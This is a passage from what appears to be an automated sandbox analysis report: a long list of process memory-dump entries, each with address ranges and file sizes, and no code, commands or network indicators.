                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/1356-225-0x000001CFD9800000-0x000001CFD9871000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/1412-209-0x00000193E2B80000-0x00000193E2BF1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/1564-196-0x0000000004EFB000-0x0000000004FFC000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                        • memory/1564-197-0x0000000005000000-0x000000000505D000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          372KB

                                                                                                                                                                                                        • memory/1564-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1612-194-0x0000000000B30000-0x0000000000BCD000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          628KB

                                                                                                                                                                                                        • memory/1612-201-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4.9MB

                                                                                                                                                                                                        • memory/1612-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1776-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1904-223-0x000002089BB40000-0x000002089BBB1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/1920-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2004-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2088-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2088-168-0x000000001BC00000-0x000000001BC02000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/2088-164-0x0000000000F40000-0x0000000000F41000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/2196-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2196-276-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2212-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2352-286-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2352-313-0x0000000004E30000-0x0000000004E31000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/2352-341-0x0000000005150000-0x0000000005151000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/2352-300-0x0000000000450000-0x0000000000451000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/2352-328-0x0000000000F90000-0x0000000000F92000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          8KB

                                                                                                                                                                                                        • memory/2468-213-0x0000021988260000-0x00000219882D1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/2488-211-0x000001882B4B0000-0x000001882B521000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/2672-204-0x0000020467070000-0x00000204670E1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/2712-324-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          120KB

                                                                                                                                                                                                        • memory/2712-329-0x0000000000418E5A-mapping.dmp
                                                                                                                                                                                                        • memory/2712-379-0x00000000052D0000-0x00000000058D6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                        • memory/2740-320-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2740-390-0x00000000779E0000-0x0000000077B6E000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/2756-265-0x0000000000950000-0x0000000000965000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          84KB

                                                                                                                                                                                                        • memory/2772-148-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          100KB

                                                                                                                                                                                                        • memory/2772-155-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          100KB

                                                                                                                                                                                                        • memory/2772-134-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                        • memory/2772-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                        • memory/2772-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          572KB

                                                                                                                                                                                                        • memory/2772-150-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          100KB

                                                                                                                                                                                                        • memory/2772-152-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          100KB

                                                                                                                                                                                                        • memory/2772-133-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          152KB

                                                                                                                                                                                                        • memory/2772-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2776-226-0x000001A643C80000-0x000001A643CF1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/2796-227-0x000001C58DC10000-0x000001C58DC81000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/2820-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3004-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3092-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3172-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3256-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3368-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3464-319-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3712-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3864-203-0x00000288323B0000-0x0000028832421000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          452KB

                                                                                                                                                                                                        • memory/3864-200-0x00000288322F0000-0x000002883233C000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          304KB

                                                                                                                                                                                                        • memory/3876-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3892-384-0x0000000004710000-0x0000000004711000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-402-0x00000000047E0000-0x00000000047E1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-393-0x0000000004770000-0x0000000004771000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3892-400-0x00000000047C0000-0x00000000047C1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-388-0x0000000004740000-0x0000000004741000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-389-0x0000000004750000-0x0000000004751000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-387-0x0000000004730000-0x0000000004731000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-377-0x0000000004700000-0x0000000004701000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-391-0x0000000004760000-0x0000000004761000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-397-0x0000000004790000-0x0000000004791000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-404-0x00000000047F0000-0x00000000047F1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-406-0x0000000004800000-0x0000000004801000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-386-0x0000000004720000-0x0000000004721000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-374-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-398-0x00000000047A0000-0x00000000047A1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-394-0x0000000004780000-0x0000000004781000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-399-0x00000000047B0000-0x00000000047B1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3892-401-0x00000000047D0000-0x00000000047D1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/3904-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3968-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4128-339-0x000001CECCCD0000-0x000001CECCD44000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          464KB

                                                                                                                                                                                                        • memory/4128-330-0x000001CECC9D0000-0x000001CECCA1E000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          312KB

                                                                                                                                                                                                        • memory/4128-316-0x00007FF77C0D4060-mapping.dmp
                                                                                                                                                                                                        • memory/4428-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4516-288-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4540-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4544-360-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          80KB

                                                                                                                                                                                                        • memory/4544-338-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4580-380-0x00000000053C0000-0x00000000058BE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                        • memory/4580-335-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          120KB

                                                                                                                                                                                                        • memory/4580-340-0x0000000000418F36-mapping.dmp
                                                                                                                                                                                                        • memory/4592-452-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4592-356-0x000001C5E2550000-0x000001C5E25C4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          464KB

                                                                                                                                                                                                        • memory/4592-325-0x00007FF77C0D4060-mapping.dmp
                                                                                                                                                                                                        • memory/4628-454-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4704-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4704-285-0x0000000000950000-0x0000000000951000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4704-310-0x00000000053B0000-0x00000000053B1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4716-308-0x0000000005530000-0x00000000055A6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          472KB

                                                                                                                                                                                                        • memory/4716-289-0x00000000055B0000-0x00000000055B1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4716-273-0x0000000000D40000-0x0000000000D41000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4716-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4716-305-0x0000000005530000-0x0000000005531000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4728-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4740-298-0x00000000056E0000-0x00000000056E1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4740-278-0x0000000000ED0000-0x0000000000ED1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4740-317-0x0000000005650000-0x0000000005C56000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                        • memory/4740-309-0x0000000005740000-0x0000000005741000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4740-295-0x0000000005C60000-0x0000000005C61000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4740-351-0x0000000006380000-0x0000000006381000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4740-315-0x0000000005780000-0x0000000005781000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4740-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4748-333-0x0000000006040000-0x0000000006061000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          132KB

                                                                                                                                                                                                        • memory/4748-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4748-479-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4748-264-0x0000000000C50000-0x0000000000C51000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4748-277-0x00000000059D0000-0x00000000059D1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4748-294-0x00000000054D0000-0x00000000059CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                        • memory/4756-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4764-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4772-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4780-297-0x00000000054D0000-0x00000000054D1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4780-291-0x0000000005670000-0x0000000005671000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4780-334-0x0000000005B10000-0x0000000005B31000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          132KB

                                                                                                                                                                                                        • memory/4780-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4780-266-0x0000000000C40000-0x0000000000C41000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4788-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4796-283-0x0000000004D80000-0x0000000004D81000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4796-301-0x0000000004D00000-0x0000000004D01000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4796-314-0x0000000004C60000-0x0000000004CF2000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          584KB

                                                                                                                                                                                                        • memory/4796-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4796-268-0x0000000000460000-0x0000000000461000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                        • memory/4796-332-0x0000000005810000-0x0000000005831000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          132KB

                                                                                                                                                                                                        • memory/4812-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4820-453-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4824-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4832-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4960-357-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          644KB

                                                                                                                                                                                                        • memory/4960-361-0x000000000046B77D-mapping.dmp
                                                                                                                                                                                                        • memory/4960-371-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          644KB

                                                                                                                                                                                                        • memory/4988-415-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                                                        • memory/4992-353-0x0000000000418EE6-mapping.dmp
                                                                                                                                                                                                        • memory/4992-382-0x00000000058D0000-0x0000000005DCE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                        • memory/4992-350-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          120KB

                                                                                                                                                                                                        • memory/5092-440-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5340-488-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5356-489-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5492-494-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5536-497-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5868-507-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5884-509-0x0000000000000000-mapping.dmp